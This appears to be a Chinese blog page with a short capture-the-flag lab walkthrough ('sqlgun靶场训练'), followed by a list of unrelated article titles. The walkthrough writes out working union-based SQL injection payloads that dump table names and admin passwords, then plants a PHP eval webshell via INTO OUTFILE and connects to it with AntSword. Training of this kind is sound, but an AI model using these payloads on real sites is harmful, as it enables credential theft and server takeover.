当前位置: 首页 > news >正文

sqlgun靶场训练

1.看到php?id=  ,然后刚好有个框,直接测试sql注入

2.发现输入1' union select 1,2,3#的时候在2处有回显

3.查看表名

-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#

4.查看列名

-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='admin' #

5.查看admin的密码

-1' union select 1,group_concat(id,admin,password),3 from admin #

6.目录扫描发现有一个phpinfo.php,访问绝对路径

6.构造一句话木马语句

-1' union select 1,'<?php @eval($_POST[cmd]);?>',3 into outfile '/var/www/html/q.php' #

7.蚁剑连接

8.根目录找到flag

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • Scrapy爬虫框架 Items 数据项
  • Linux——K8s集群部署过程
  • C++速通LeetCode中等第7题-和为K的子数组(巧用前缀和)
  • git 更新LingDongGui问题解决
  • chapter2-站点首页功能实现
  • python协程,线程,进程详细解释和使用
  • [python3] 处理函数的重试
  • node nvm 基础用法
  • 大批量查询方案简记(Mybatis流式查询)
  • 云原生信息安全:筑牢数字化时代的安全防线
  • 计算机网络 8.*结构化布线
  • 软设9.20
  • 工作流activiti笔记(六)已办列表
  • 【鸿蒙】HarmonyOS NEXT开发快速入门教程之ArkTS语法装饰器(上)
  • 固执和坚持99%的人不作区分
  • 【技术性】Search知识
  • 【跃迁之路】【699天】程序员高效学习方法论探索系列(实验阶段456-2019.1.19)...
  • 07.Android之多媒体问题
  • Angularjs之国际化
  • co.js - 让异步代码同步化
  • es6要点
  • es的写入过程
  • golang中接口赋值与方法集
  • LintCode 31. partitionArray 数组划分
  • Material Design
  • PHP变量
  • SpringCloud集成分布式事务LCN (一)
  • 搭建gitbook 和 访问权限认证
  • 分享一个自己写的基于canvas的原生js图片爆炸插件
  • 将 Measurements 和 Units 应用到物理学
  • 批量截取pdf文件
  • 前端
  • 三栏布局总结
  • 山寨一个 Promise
  • 实习面试笔记
  • 网络应用优化——时延与带宽
  • 微信支付JSAPI,实测!终极方案
  • 译自由幺半群
  • 责任链模式的两种实现
  • 阿里云API、SDK和CLI应用实践方案
  • ​Benvista PhotoZoom Pro 9.0.4新功能介绍
  • #pragma 指令
  • (2020)Java后端开发----(面试题和笔试题)
  • (C#)if (this == null)?你在逗我,this 怎么可能为 null!用 IL 编译和反编译看穿一切
  • (function(){})()的分步解析
  • (附源码)springboot“微印象”在线打印预约系统 毕业设计 061642
  • (更新)A股上市公司华证ESG评级得分稳健性校验ESG得分年均值中位数(2009-2023年.12)
  • (九)One-Wire总线-DS18B20
  • (原創) 如何安裝Linux版本的Quartus II? (SOC) (Quartus II) (Linux) (RedHat) (VirtualBox)
  • (转载)PyTorch代码规范最佳实践和样式指南
  • (转载)在C#用WM_COPYDATA消息来实现两个进程之间传递数据
  • .bat批处理(一):@echo off
  • .net mvc actionresult 返回字符串_.NET架构师知识普及
  • .Net 高效开发之不可错过的实用工具
  • .Net(C#)自定义WinForm控件之小结篇